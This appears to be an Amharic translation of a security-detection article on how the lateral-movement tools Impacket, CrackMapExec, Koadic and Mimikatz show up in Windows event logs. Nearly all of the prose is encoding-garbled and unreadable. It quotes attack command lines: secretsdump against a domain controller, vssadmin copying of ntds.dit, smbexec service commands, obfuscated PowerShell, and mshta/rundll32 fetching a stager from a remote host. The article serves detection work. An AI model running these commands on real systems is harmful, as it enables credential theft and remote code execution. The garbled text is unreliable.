á áľáá
áľ ááá á¨áá°ááą áĽááśá˝ ááĽá á á¨áááą áĽáŤá°á ááᥠáááłááĄ-
áĽááá
ááłáŞáŤáá˝ áááááŞáŤ áá áá° ááľáĽ ááááŁáľ áĽá
á áá áĽááłááá áἠááŁá á¨áááŁá áá, ááá áá á áá á¨á° áááľ ááľáĽ áááá á áĽááľ áĽáľááľ. á áĽááá˝ á¨ááŞááľá áááŁáąá á°á¨áľá á á°ááŤáŠ á¨áĽááą á°á¨ááá˝ áá áááᢠá áááŤá˝á áá áá
áááá¨áľ á áľá¸á᪠áĽá áĽá áá á á´áááá áĽááłáł áĽáť áá
áá ááľá¨á á ááĽá:
- á¨á áá ááłáŞáŤáá˝ áĽáá´áľ áĽáá°áá አáá¨áą. á áĽááá˝ áá áá áá á áĽááłááŁá¸á áĽá áá á´áááááá˝á áá áá áĽáá°áá˝á áááá˘
- á áĽááą á¨ááááŞáŤ á°á¨ááá˝ ááľáĽ á áá¨á á°á áááľ ááłáŞáŤáá˝ áŤáá°áááá áŤáá. á¨áľáá á°á¨áá áááá áá˝áá, ááááŤáąá á áĽáá ááľáŁá á áĽá áá, ááá á áĽáá áá°á á˛á áŤááłáá á¨áá°á¨á° áááľ ááľááśá˝á áľááá áá áá. á¨áľáááąá á á ááá á°áá°ááľ ááááľ ááťáá, áľááá á°á¨á᪠áĽáá áľáá´á á¨ááá¨áľ ááááľ áááłá.
- á¨áá¨áŤ ááá፠ááłáŞáŤáá˝ á¨áá¸áľ á áááłá áá¤áśá˝á áŤáľáááą. á ááłááľ áľáááśá˝ á áĽáááľ áá áĽáť á˛áá á á°á°ááá áľá á°áśá˝ ááአáĽáá°áá˝á áááááľ á¨ááĽáá. áĽááá áá á áá á¨á° áááľ á ááłáŽá˝ ááľáĽ áááááá áá¨á áááááľ á ááááŞáŤ áĽááł á¨áááááľ á¨áááá á á ááĽá áŤáá¸á ááááśá˝ á áá˘
áĽááá ááłáŞáŤáá˝ áá áĽááá˝ áá áá°áŁá? á˘áááŹáľ á¨áá á áĽáááš á¨ááŞááľá ááá áááŁáľá á°á¨áľá á á°ááŤáŠ á¨áĽááą á°á¨ááá˝ áá ááŤáááá á¨áá˝á áľáá á¨áááá˝ á¤á°-áá˝áááľ áŤáááᢠáĽá ááłáŞáŤáá˝ áĽáá° Metasploit áŤá á¨á˘áááŹáľ áááá˝á á¨ááľáĽ áá áááᢠáľáááá˝á á áááľ áááľáŹáľ dcomexec áĽá wmiexec á áááŁá¨á˘áááŹáľ á¨á°á¨áአá¨áá á°á¨ áľááľáł á°áĽá°áŽá˝á áááááľ ááľáĽáŤá áá¨ááť á ááᢠá áá¤áąá, á¨áĽáá°áá á áááľ á¤á°-áá˝áááľ áĽáá áľáá´á á áľááá ááááą á°áá˝áŚáá˝á ááááąá áŤá¨áááŁá.
áľá CrackMapExec (ááá á ááá á˛á¤áá˘)ᣠááŁáŞááš á á ááľ ááááŤáľ âá Impacket á¨á°ááá á°â áĽáá á˝áááᢠá á°á¨ááŞáᣠCME ááłáá áááłáá˝ ááá á¨áá á°ááŁá á ááᥠáá áááŤáľá á¨ááá ááá˝á ááá áážá˝á áááááľáŁ áĽá á¨áá°áááŹá°á ááá á˘ááá¨á ááŞá ááááľ ááľáá¸á፠ááá˘áŤ áĽá Bloodhound á áŚááą áá ááá˘
áŚáľá°áá áááŤá˝á áŽá á˛á ááᢠáĽáą á áŁá áľáŠáľ áá ᣠá 25 á ááá á áá á¨á áá áŽááá¨ááľ DEFCON 2017 ááá§á áĽá áá°á á áŤááá á áŤááľ á ááᥠá HTTPᣠJava Script áĽá Microsoft Visual Basic Script (VBS) áá°áŤáᢠáá á áŤááľ á¨ááŹáľ áá ááá ááŁáááĄ- ááłáŞáŤá á áááśá ááľáĽ á¨á°ááᥠá¨áĽáá áĽá á¤á°-ááťáááľá áá áááᢠááŁáŞááš COM Command & Control ááá C3 áĽáá áá áŠáłáá˘
IMPACKET
á¨á˘áááŹáľ á°ááŁá á áŁá á°á ááᣠá AD ááľáĽ á¨áłá°áł áĽá á¨ááľáĽ MS SQL á ááááŽá˝ áá¨áá á¨áá°áĽá°áĽ ááᎠᣠááľááááśá˝á áááááľ á´áááŽá˝á áŤá áá áá ᨠSMB á áĽáĽá áĽááľ áá ᣠáĽá á¨á°á áá á¨ááá áá áážá˝á á¨áŤááá ntds.dit ááá á¨á ááľ á፠ááááľá˘ á°ááŁáŁáŞ. á˘áááŹáľ á áŤáľ á¨á°ááŤáŠ áá´áá˝á á áá áá á áááľ áľáááá˝á áŤáľáá˝ááᥠá WMI á áŠáᣠá¨áááśááľ áááááĽá á ááá áᣠá˛áŽá áĽá á¤áľá¤áá˘á áááľá°áłá°á á áááááľáŁ ááá ââá°áá ááľááááśá˝á áááááá˘
ááľáĽáŤá ááťáť ááŁáŤ
ááľáĽáŤáááľá áĽá¨áᢠáá áááąáá á¨á°á áá áá˝áá˝ áĽá á¨á፠á°ááŁáŁáŞáá˝ ááŤááŁáĽá á¨áá˝á ááá ááᢠá áĽáą á ááŤááᾠᨠLSA, SAM, SECURITY, NTDS.dit á¨ááľáłááť áŚáłáá˝ á ááá˝á ááááľ áá˝áá, áľááá á á á°ááŤáŠ á¨áĽááą á°á¨ááá˝ áá ááłá áá˝áá. á ááá ááľáĽ á¨ááááŞáŤá áĽááá á á¤áľá¤áᢠá áŠá áá¨ááἠáá ᣠáá á á¨á°á áááá á¨ááá áá ááá áá˝ áá˛áŤáá ááá ᨠHash áĽááľá áááááᢠááĽáá áá° á áááááľ ááĽáĽá á áľá°áłáłáŞ (á˛.á¤á.á¤á.) ááłá¨áť áááááľ áĽá á¨áááŹá ááŽáśáŽáá á áá áá áá° áááᥠááááŁáľ áĽáŤá áááŁá ᣠá áá á á áĽáá á¨ááááľ á áááŤáá˝á áá¨á áááá áĽá á SMB á áŠá áá¤áąá ááááľ áá˝ááá˘
á ááľ áá. 1 á áľááá áĽáá´áľ á¨áááŹá ááŽáśáŽáá á˛á áá á¨á¤áá¤áľá¤ áá á ááááá˘áŤ ááá ááááľ áĽáá°ááťá áĽááŤááᢠáá áá áááľá¨á á¨DCERPC áľáááá á opcode 15 - OpenKey áá ááá˘
áŠá. 1. á¨áááŹá ááŽáśáŽáá á áá áá á¨ááááá˘áŤ áááá ááááľ
á á°á¨ááŞá ᣠá ááá ááľá¨áľ á˛áťá ᣠáĽá´áśáš á SaveKey áľááá á opcode 20 ááááŁá ᢠá˘áááŹáľ áá áá á¨ááŤá°ááá á á°áᨠááááľ ááᢠáĽá´áśášá á áľá á¨8 á¨áááá° ááááá˝ ááĽá¨ááá á ááá .tmp á á°áá á ááá áá áŤáľáááŁáᢠá á°á¨ááŞá, á¨áá á ááá á°á¨á᪠ááŤáá á SMB á áŠá á¨System32 áá፠(ááľá 2) áá¨á°áłá.
áŠá. 2. á¨áááľ áá˝á á¨ááááá˘áŤ ááá áááááľ áĽá
áľ
ᨠWinreg ááŽáśáŽáá ᣠá¨á°áá°á áľáá˝á ᣠáľáááá˝á áĽá áľáááášá á áá áá á¨á°áá°á á¨ááááá˘áŤ á áááŤáá˝á á áá á¨á á á ááłá¨ áá¨áĄ áá áĽáá°áá áŤá áĽáá áľáá´á ááááľ áá˝ááá˘
áĽáá˛áá, áá ááá á ááá á¨á°ááá áľ ááľáá á áááśááľ ááľá°áľ áááἠááľáłááť ááľáĽ áá°áá. áááłá, áľáááá á áááá ááááŤáľ
secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC
á áááśááľ á áááá 2016 áááἠááľáłááť ááľáĽ á¨áá¨á°ááľá á¨ááá á á°á á°á¨á°áá˝ áĽááŤáá-
1. 4624 - á¨áááľ ááá˘áŤ.
2. 5145 - á¨áááŹá á¨áááľ á áááááľ á¨ááłá¨áť ááĽáśá˝á áá¨áááĽ.
3. 5145 - á System32 áá፠ááľáĽ á¨á ááľ ááá á¨ááłá¨áť ááĽáśá˝á áá¨áááĽ. ááá á¨áá á¨á°á áá°á á¨áááá° áľá á ááá˘
4. 4688 - vssadmin á á¨ááŤáľááá cmd.exe áá°áľ ááá á:
âC:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
5. 4688 - á áľáĽáá áá°áľ ááá á-
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
6. 4688 - á áľáĽáá áá°áľ ááá á-
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
7. 4688 - á áľáĽáá áá°áľ ááá á-
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
Smbexec
áá áĽáá° áĽá á¨áľá á¨-áĽáá á ááłáŞáŤáá˝áŁ Impacket ááááľ áľááá ááľáá¸á፠áááá˝ á ááľá˘ á áááľ áá˝á áá á ááá°ááá áľááá áźá á áá°áĽ smbexec áá áĽáá°áŠáŤááᢠáá ááá á SMB á áŠá á ááá áá ááá á áá˝ áá¨áááĽá áááááᢠá ááľ áá. 3 á¨áĽáá°áá á áááľ ááłáŞáŤ á á áŤá ááłá áĽááŤáá, á áá ááłá áá á¨á áŤáŁá˘ á áľá°áłáłáŞ áŽááśá áá.
áŠá. 3. smbexec ááľá°ááĽáŤá áŽááśá
á¨áá¨áá፠á áá á smbexec ááľáĽ á¨ááááŞáŤá áĽááá SCM á OpenSCManagerW(15) áľááá ááááľ ááᢠáá áá á¨ááłáá ááᥠáá° DUMMY á¨á°ááá á¨á á¨áá˝á áľá ááľá á ááá˘
áŠá. 4. á¨á áááááľ ááĽáĽá á áľá°áłáłáŞá áááááľ áá áá
á ááá á á áááááą á¨á°áá á¨á ᨠCreateServiceW (12) áľáááá á áá áá áá. á smbexec ááłá áá, á áĽáŤááłááą áá á°ááłáłá á¨áľáĽáá áááŁáł á áááᎠáá¨áľ áĽáá˝ááá. á ááľ áá. 5 á á¨ááá´ ááá á¨áľáááá á¨ááááᥠáááŞáŤáá˝ áŤáłáŤá, á˘áŤ - á áĽáá áá áááá á áá˝áá. á¨ááááá ááá áľá ᣠáááŤá áĽá á¨áá¤áľ ááá ááá¨á áĽáá°áá˝á áá¨áľ ááá áá ᣠáá á¨á°áá¨á á¨á˘áááŹáľ áááá á áááᎠáłááĽáľ ááááἠá áŁá á¨áŁáľ ááá˘
áŠá. 5. á¨á áááááľ áááŁá áŞáŤ á áľá°áłáłáŞá á áá áá á áááááľ áááá á áá áá
Smbexec á áááśááľ ááľá°áľ áááἠááľáłááť ááľáĽ ááá˝ á¨áá áąáŤáá˝á áá°áá. á áááśááľ á áááá 2016 áááἠááľáłááť áá áá ááá°ááá áľááá áźá ᨠipconfig áľáĽáá áá áŁá¨áá¨á°ááľá á¨ááá á á°á á°á¨á°áá˝ áĽááŤááá˘
1. 4697 - á áááááąá á á°á áá áá˝á áá ááŤá;
%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
2. 4688 - ᨠcmd.exe áá°áľá á¨ááĽá 1 áá᪠áĽá´áśá˝ áá ááá áá˘
3. 5145 - á C$ áá፠ááľáĽ á¨__áá¤áľ áááá á¨ááłá¨áť ááĽáśá˝á áá¨áááĽá˘
4. 4697 - á á°á áá áá˝á áá á áááááąá ááŤá.
%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
5. 4688 - ᨠcmd.exe áá°áľá á¨ááĽá 4 áá᪠áĽá´áśá˝ áá ááá áá˘
6. 5145 - á C$ áá፠ááľáĽ á¨__áá¤áľ áááá á¨ááłá¨áť ááĽáśá˝á áá¨áááĽá˘
Impacket á¨áĽááľ ááłáŞáŤáá˝á ááááááľ áá°á¨áľ áá. á áááśááľ áá á¨á° áááľ ááľáĽ áááá ááŽáśáŽáá˝ áá°ááá áĽá á á°ááłáłá áá á¨áŤáą áŁá áŞáŤáľ á ááľ. á¨á°áá°á á¨áááá áĽáŤááá˝áŁ áĽá á¨á¤áľá˛á¤áᤠá¤áá áá á¨áľáááá˝ á ááŁá á áŁá ᪠ááᣠáĽá á¨ááá áľáá˝ á áá¸áľ áĽá SMB áááŤáľ SYSTEM32 áĽáá á áá˘
CRACKMAPEXEC
á¨CME ááłáŞáŤá á ááááľ á¨á°áá°áá á áĽá á ááľááአááľáĽ áááŤááľ á¨ááŤá°ááá¸áá á¨á°áááą á°ááŁáŤáľá á áŤáľ á°á áááľáŤáľ ááᢠá¨áłááá á˘ááá¨á ááŞá áĽá á°ááá áá á áĽáá¨áľ áĽáá˛á°áŠ áŤáľá˝áááłáᢠáľáááá˝á á áááłá áááł áááľáá¸á CME áá°áĽáá¸á áá˝ááᢠBloodhound (á¨á°áᨠá¨áľáá ááłáŞáŤ) á áá áá á áĽá á¨áá á¨á፠á áľá°áłáłáŞ ááá áá áááá á áŤáľ á°á ááŤá°ááá áá˝ááá˘
á°á ááá°áľ
Bloodhound áĽáá° áŤáąá á¨áťá ááłáŞáŤ á ááľááአááľáĽ á¨áá á ááľ áĽáá˛áŤá°áá áŤáľá˝áááłáᢠáľáá°á áááá˝áŁ áá˝áá˝áŁ áĄáľáá˝áŁ ááá-áááá˝ ááἠáá°á áľáŁá áĽá áĽáá° PowerShell áľááŞááľ ááá áááľáŽá˝ áááŁáᢠá¤áá˛á¤á ááá á SMB áá á¨á°áá á¨áą ááŽáśáŽáá˝ áá¨á ááá°áĽá°áĽ áĽá á áá ááááᢠá¨CME áá á°áľ ááá Bloodhoundá áá° á°ááá áá˝á áááá¨áľ ᣠáááľáŹáľ áĽá á¨á°á°á á°á áá áá¨á á¨á°ááá á áá áĽáá˛áá á ááá áľáááłá ᣠá áá á á á˛áľá°á ááľáĽ áŤááľá áľáááśá˝ á áŤáľ-á°á áĽáá˛á°áŠ áĽá áĽáá˛áłáŠ áŤá°ááá¸ááᢠá¨Bloodhound áľááá á áááľ á¨á°á°á á°á áá áá¨á á ááŤá ááá áŤáááŁáᣠáá á á¨á áĽáá áá˝á áá° á፠á áľá°áłáłáŞá á áአááááľ áááááľ áŤáľá˝ááá˘
áŠá. 6. Bloodhound á áááá˝
á á°ááá áá˝á áá áááľáŤáľ ááá ATSVC áĽá SMB á áá áá áľáŤ áááĽáŤáᢠATSVC á¨áááśááľ á°ááŁá áááááĽá áá áááľáŤáľ á áááá˝ ááᢠCME á ááľááአáá áľáŤáá˝á áááá á NetrJobAdd(1) á°ááŁáŠá áá áááᢠᨠCME ááá á¨ááá¨áá ááłá á fig. 7: áá á á¤ááľá¤áá¤á á áá¸áľ á áááá ááá áá° cmd.exe áľááá áĽá á¨á°á°á á áŽáľ áĽáŞ ááá˘
ááľá.7. á CME á áŠá á ááľ á°ááŁá ááá á
á°ááŁáŠá áááá¸á á¨áá¨á á áá á¨á°ááá áá˝á Bloodhound áĽáŤáąá ááááŤá, áĽá áá á áľáŤáá ááľáĽ ááłáŤá. ááá áá°á á áĄáľáá˝á áááááľ á á¤áá˛á¤á áá ááá˝ ááááťáᣠááá áá˝áá˝ áĽá á á፠ááľáĽ áŤá á°á áááá˝ ááááᣠá SRVSVC NetSessEnum áĽáŤá á áŠá áľá áá á°á áá ááá-áááá˝ áá¨á ááááľá˘
áŠá. 8. á SMB á áŠá á¨áá ááá áááá˝á áááá ááááľ
á á°á¨ááŞá á°áá á á°ááá áá˝á áá áŚá˛áľ ááľá¨áá áááá ááłáá፠4688 (á¨áá°áľ áá áŤ) áĽá á¨áá°áą áľá áŤáá ááľá°áľ á áĽáŽ áááŁáᢠC:WindowsSystem32cmd.exeÂť
. á áĽáą ááľáĽ á¨ááłáááľ á¨áľáĽáá ááľáá áá᪠áĽá´áśá˝ áá¸á-
cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , ⌠, 40,41 )-jOIN'' ) "
enum_avproducts
ᨠenum_avproducts ááá á¨á°ááŁáŤáááľ áĽá á á°ááŁá á á ááá á áŁá á áľá°áłá˝ ááᢠWMI á¨á°ááŤáŠ á¨áááśááľ áááá˝ áá¨á áááááľ á¨WQL áá áá áááá áĽááľáľá áá ááá áľáááᣠáá á á áá á¨áą áá á¨CME ááá á¨áá ááá ááᢠá á°á áá áá˝á áá áľáá°áŤááľ á¨áá¨áá¨áŤ ááłáŞáŤáá˝ áAntiSpywareProduct áĽá AntiMirusProduct áááá˝ áĽáŤááá˝á áŤáááŤáᢠá áľááááá áá¨á áááááľ ááá ᨠrootSecurityCenter2 á¨áľá áŚáł áá ááááá á¨ááŤá á¨WQL áĽáŤá áŤáááŤá áĽá ááá˝ ááá ááᢠá ááľ áá. 9 á¨áĽáá°áá á áááľ áĽáŤááá˝á áĽá ááážá˝á áááľ áŤáłáŤá. á áĽá ááłá ááľáĽ á¨áááśááľ á°á¨ááŤá á°áááˇá.
áŠá. 9. ᨠenum_avproducts ááá á¨á ááłá¨ áá¨áĽ áĽáá
áľáá´
áĽá áá WMI (Trace WMI-Activity) áŚá˛áľ ááľá¨áᣠáľá WQL áá ááá˝ á áá áá¨ááá˝á ááááľ á áá˝ááŁá¸á ááľá°áśá˝ ááľáĽ áá á áá˝ááᢠááá áá á¨áá enum_avproducts áľááŞááľ á¨á°á°áŤ ááłáá፠11 áŤáá ááľá°áľ áá¨ááťáá˘áĽáŤááá áŤáá¨á áá á¨á°á áá áľá áĽá áľá á rootSecurityCenter2 áľá áŚáł ááááá˘
áĽáŤááłááą á¨CME áááá˝ á¨á¨áŤáłá¸á á ááśá˝ áá áŻá¸áᣠá¨á°áá°á á¨WQL áá ááá˝á ááá ááá á á°ááŁá áááááĽá ááľáĽ á¨á°áá°á á áááľ á°ááŁá á ááá á á á¤áá˛á¤á áĽá á á¤áľá¤áᢠááľáĽ á¨á°á ááĽááľ áĽá á¨á°á-á°áŽá áĽáá áľáá´ ááá˘
KOADIC
á¨Koadic áአáŁá ᪠á áĽáŽááἠááŤáľááŞááľ áĽá áŞá˘áľááŞááľ á áááśááľ ááľáĽ áá áá ááᢠá¨áá á ááá, á¨ááŹáľ áá á¨ááá á ááááŤá áá¨á°áá - áááľá, ááŤá áĽáá á¨ááá áĽá áá°á á á¨áááśááľ ááłáŞáŤáá˝á áá ááá. áá áá ááá áľááá áĽá ááĽáĽá (á˛á¤áá˛) ááłáŞáŤ áá, ááááŤáąá á¨á á˝áł á áá, "á˘áááááľ" á áá˝á áá á°ááá, áá á ááĽáĽá áĽáá˛á°á¨áá áľ áŤáľá˝áá. áĽáá˛á ááááą áá˝á á áŽá á˛á áááľ ááľáĽ "ááá˘" á°áĽá áá áŤá. á¨á°á áá áá áá á áá áááľáŤáľ á á áአááĽáśá˝ á¨áá Koadic á¨á°á áá áá፠áááŁá áŞáŤ ááá፠(UAC bypass) á´áááŽá˝á á áá áá á¨ááłá°á á˝ááł á ááá˘
áŠá. 10. Koadic áľááá áźá
á°ááá á¨áŽáááľ áĽá áááŁá áŞáŤ á áááá áá áááááľ áááá á áá áľá˘ áá áá áááľá¨á ááľá á¨á°ááááá áŠá áá á ááááľ áĽá á¨á°á¨áááš á ááąá á áá áá áááá á¨áŽá á˛á á áŤá ááááľ á ááŁáľá˘ á ááľ áá. 11 áá°á¨áá mshta ááłá áŤáłáŤáá˘
áŠá. 11. á¨ááá-áááá áááá ᨠCnC á áááá áá
á áááš á WS á°áááá ᣠá áááá á WScript.Shell áĽá STAGER ᣠSESSIONKEY ᣠJOBKEY ᣠJOBKEYPATH ᣠEXPIRE á°ááááŽá˝ áľáá áá ááá áá áá¤áśá˝ ááá áá¨á áĽáá°áŤá ááá ááááᢠáá á¨CnC á áááá áá á á¤á˝á˛á˛á áááááľ ááľáĽ á¨ááááŞáŤá á¨áĽáŤá-ááá˝ áĽááľ ááᢠá°á¨áłá áĽáŤááá˝ á¨á°á áŠáľ áááá˝ (á°á¨ááá˝) á°ááŁáŤáááľ áá á ááĽáł á¨á°áŤáŤá áá¸á. ááá á¨áŽá á˛á áááá˝ á¨áá°áŠáľ á¨áá á¨CnC ááá áá áá áĽáť ááá˘
Mimikatz
áá CME á¨Bloodhound áá áĽáá°áá°áŤáŁ Koadic á¨áááŤáľá áá áĽáá° á¨á°áᨠááŽááŤá áá°áŤá áĽá áĽáąá áááľáŹáľ áĽá ááááśá˝ á ááľá˘ á¨áłá˝ á¨áááŤáľá á°á¨á áááá¨áľ á¨áĽáŤá-ááá˝ áĽááľ ááá˘
áŠá. 12. Mimikatz áá° Koadic áŤáľá°ááá
á áĽáŤáá ááľáĽ á¨áŠá áá á á áá¸áľ áĽáá´áľ áĽáá°á°áá¨á¨ áá¨áľ áá˝ááᢠáá°áá¨á á ááá á°á áŤá á¨ááá á csrf á°áááá áĽá´áľ á áá. ááľá ááá áľáŠá¨áľ á áľáľáĽ; CSRF á á°áááś á á°áᨠááááľ áĽáá°áá¨áł ááá˝áá áĽáááááᢠáá¸á ᨠKoadic áá á áŤá ááá˝ ááŁáŁ á¨áľáá áŽáľ á¨áááŤáľá áá á¨á°áááᢠáĽáą á áŁá áľáá áá ᣠáľáááá áá áá ááĽáŚášá áĽáááá¨áľ ᢠá¤á64 á˘ááŽáľ á¨á°á°á¨áá áááŤáľá á¤á°-áá˝áááľáŁ á¨áááá á°á¨áłáłá .NET áááᣠáĽá áááŤáľáá ááááľ á¨áááą ááááŽá˝ áĽáá á áᢠá¨ááľáá¸ááŤá áá¤áľ á á ááłá¨ áá¨áĄ áá ááá˝ á áá á˝áá ááľáĽ á°áááá.
áŠá. 13. Mimikatz á áŠá
áá˝á áá á¨áááľ áá¤áľ
Exec_cmd
áŽá á˛á˝ á áááľ áľáááá˝á ááľáá¸á á¨áá˝á áááá˝ á ááľá˘ áĽáá á°ááłáłá ᨠURI áľáááľ áá´ áĽá á¨áłáá á¨á˛áľ áĽá ᨠcsrf á°ááááŽá˝á áĽááŤááᢠá exec_cmd ááá áá á¨áźá áľáááá˝á áááá¸á áá°áá˝áá á áŤá áŽáľ á°á¨ááŻáᢠá¨áá¨á°áá áŽáľ á CnC á áááá HTTP ááá˝ áá ááłáŤáá˘
áŠá. 14. á¨ááľá¨á áŽáľ exec_cmd
ááŽáľ á ááťá¸á á¨ááłááá WS áŁá ᪠áá á°áááá GAWTUUGCFI áŤáľááááᢠá áĽáą áĽááłáł, á°á¨áá á áááąá áá áŤá, áááľ á¨áŽáľ á áááŤáá˝á á ááľáŹáľ - shell.exec á áá¤áą á¨ááἠáĽá¨áľ ááááľ áĽá shell.run áłááááľ.
áŽá á˛á˝ á¨á°ááá° ááłáŞáŤ á áá°ááᣠááá áá á á áá áľáŤáá ááľáĽ á¨áááá áľ á¨áŤáą á ááśá˝ á ááľá˘
- á¨á¤á˝á˛á˛á áĽáŤááá˝ áአááľá¨áł áŁ
- WinHttpRequests API á áá áááŁ
- á ActiveXObject á áŠá á¨WScript.Shell ááá ááá ááŁ
- áľáá á°ááťá á áŤá.
á¨áááť áááááľ á°á¨ááá áŤáľááá¨áá, áľááá á áááśááľ ááľá°áśá˝ á áŠá áĽáá áľáá´áá ááááľ ááťáá. á mshtaᣠáá ááľá°áľ 4688 ááᣠáá á á¨á áá áŁá ᪠áá áá°áľ ááá áŠá áŤááááłááĄ-
C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6
Koadic á á ááŽáĽá áľ ááᣠááá˝ 4688 ááľá°áśá˝ ááá á áá ááአá¨áááŠáľ áŁá áŞáŤáľ áá ááłáŠ áá˝áááĄ-
rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1
áááśá˝
á¨ááŹáľ á᪠áŤáá áᎠá áłáá á áááááá˝ áááľ á°ááłá
ááľ áĽáŤáá ááᢠá áĽáŽ á¨á°á°áŤáá á¨áááśááľ ááłáŞáŤáá˝á áĽá áľááśá˝á áááááłá¸á áá áááᢠáłááááš ááłáŞáŤáá˝ KoadicᣠCrackMapExec áĽá Impacket áá
áá ááá
á áá¨á°á á á¤áᲠáŞáááśá˝ ááľáĽ á á°á°ááá á˛áłáŠ áĽááŤááᢠááĽááá
ááłáŞáŤáá˝ á GitHub áá áŤá ášáŤáá˝ ááĽá áĽáŤá°á áá, á áłá˛áśá˝ ááłáŤá (á áá á áá áá° á ááľ áşá
áá°á á á). á ááááŤá á áááááą á°ááłá
ááľ áĽáŤáá áá-á áĽááá˝ á¨áśáľá°á ááá ááłáŞáŤáá˝á á áŤáľáááá ᣠáĽááą ááľááá á á°áááá˝ áá˝áá˝ áá áá¸á áĽá á¨á°á
áááľ áĽááááá˝á áááá áá¨áłáᢠá á ááłá¨ áá¨áĽ ááľá°ááĽá áĽááľ áá áĽáá°áŠáŤáá-á¨áá á¨á°áááá áĽáŤááłááą ááłáŞáŤ á ááľááá áľáŤáá ááľáĽ áąáŤáá áá°áá; á¨áĽááą áááá áĽááľ áááłá˝áá áĽááľááľá°áá á áľá˝ááá
á°áŤá˛áŤá:
- á ááśá áłááŞá, á¨áŁáá፠á áááááľ áááŞáŤ ááá, PT á¤ááľáááľ á°á áááľ ááá¨á, á áááłá á´áááááá˝
- Egor Podmokov, á¤ááľáááľ, PT á¤ááľáááľ á°á áááľ ááá¨á, á áááłá á´áááááá˝
ááá: hab.com